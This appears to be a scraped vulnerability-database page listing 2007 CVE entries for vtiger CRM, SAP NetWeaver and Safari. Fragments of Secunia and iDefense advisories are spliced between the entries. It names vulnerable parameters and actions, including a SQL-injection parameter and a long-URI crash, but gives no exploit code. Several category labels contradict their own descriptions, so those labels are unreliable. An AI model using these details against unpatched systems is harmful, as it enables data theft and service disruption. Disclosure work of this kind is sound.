[1] http://labs.idefense.com/intelligence/vulnerabilities/display.php?
id=556
[2] http://docs.info.apple.com/article.html?artnum=305947
[3] http://secunia.com/blog/7/
----------------------------------------------------------------------
DISCLOSURE TIMELINE
----------------------------------------------------------------------
04/02/2007 Initial vendor notification (by iDefense)
04/09/2007 Initial vendor response
07/11/2007 Apple security bulletin & patches available
07/11/2007 Public disclosure of iDefense advisory
09/03/2007 Public disclosure of this advisory
VAR-200707-0375 | CVE-2007-3600 | vtiger CRM of wordintegration Vulnerabilities that prevent field-level security permissions in components |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
WordPlugin in the wordintegration component in vtiger CRM before 5.0.3 allows remote authenticated users to bypass field level security permissions and merge arbitrary fields in an Email template, as demonstrated by the fields in the Contact module. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0373 | CVE-2007-3598 | index.php of vtiger CRM Vulnerabilities in which all user names are acquired |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
index.php in vtiger CRM before 5.0.3 allows remote authenticated users to obtain all users' names and e-mail addresses, and possibly change user settings, via a modified record parameter in a DetailView action to the Users module. NOTE: the vendor disputes the changing of settings, reporting that the attack vector results in a "You are not permitted to execute this Operation" error message in a 5.0.3 demo. vtiger CRM is prone to a denial-of-service vulnerability
VAR-200707-0489 | CVE-2007-3617 | vtiger CRM of report Vulnerability to read arbitrary private module entries in modules |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The report module in vtiger CRM before 5.0.3 does not properly apply security rules, which allows remote authenticated users to read arbitrary private module entries. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0374 | CVE-2007-3599 | vtiger CRM Vulnerabilities such as importing contact information |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
vtiger CRM before 5.0.3 allows remote authenticated users to import and export the information for a contact even when they only have the View permission. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0379 | CVE-2007-3604 | vtiger CRM Vulnerable to data restrictions |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
vtiger CRM before 5.0.3 allows remote authenticated users with access to the Analytics DashBoard menu to bypass data restrictions and read the pipeline of the entire organization, possibly involving modules/Potentials/Potentials.php. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0378 | CVE-2007-3603 | vtiger CRM of dashboard In SQL Injection vulnerability |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
SQL injection vulnerability in the dashboard (include/utils/SearchUtils.php) in vtiger CRM before 5.0.3 allows remote authenticated users to execute arbitrary SQL commands via the assigned_user_id parameter in a Potentials ListView action to index.php. vtiger CRM is prone to a sql-injection vulnerability
VAR-200707-0376 | CVE-2007-3601 | vtiger CRM Vulnerability in reading calendar items of specific users |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
vtiger CRM before 5.0.3, when a migrated build is used, allows remote authenticated users to read certain other users' calendar activities via a (1) home page or (2) event list view. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0488 | CVE-2007-3616 | vtiger CRM of index.php Vulnerable to management changes |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
index.php in vtiger CRM before 5.0.3 allows remote authenticated users to perform administrative changes to arbitrary profile settings via a certain profilePrivileges action in the Users module. vtiger CRM is prone to a denial-of-service vulnerability
VAR-200707-0377 | CVE-2007-3602 | vtiger CRM of SOAP Web Data access vulnerabilities in services |
CVSS V2: 5.5 CVSS V3: - Severity: MEDIUM |
The SOAP webservice in vtiger CRM before 5.0.3 does not ensure that authenticated accounts are active, which allows remote authenticated users with inactive accounts to access and modify data, as demonstrated by the Thunderbird plugin. vtiger CRM is prone to a remote security vulnerability
VAR-200707-0487 | CVE-2007-3615 | Windows Run on SAP NetWeaver Application Server of Internet Communication Manager Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Internet Communication Manager (aka ICMAN.exe or ICM) in SAP NetWeaver Application Server 6.x and 7.x, possibly only on Windows, allows remote attackers to cause a denial of service (process crash) via a URI of a certain length that contains a sap-isc-key parameter, related to configuration of a web cache. Internet Communication Manager is prone to a remote denial-of-service vulnerability.
A remote attacker can exploit this issue to cause the affected service to crash, effectively denying service to legitimate users.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now
available:
http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
The vulnerability is caused due to an error within the Internet
Communication Manager (ICM - ICMAN.exe) component and can be
exploited to crash the ICM process by requesting an overly long
(around 264 bytes), specially crafted URI.
SOLUTION:
Update to the latest version.
PROVIDED AND/OR DISCOVERED BY:
Mark Litchfield, NGSSoftware
ORIGINAL ADVISORY:
http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-internet-communication-manager-dos/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0562 | CVE-2007-3514 | Apple Safari Vulnerabilities that can bypass the same origin policy |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
Cross-domain vulnerability in Apple Safari for Windows 3.0.2 allows remote attackers to bypass the Same Origin Policy and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute to a file:// location, a different vector than CVE-2007-3482. Safari For Windows is prone to a security bypass vulnerability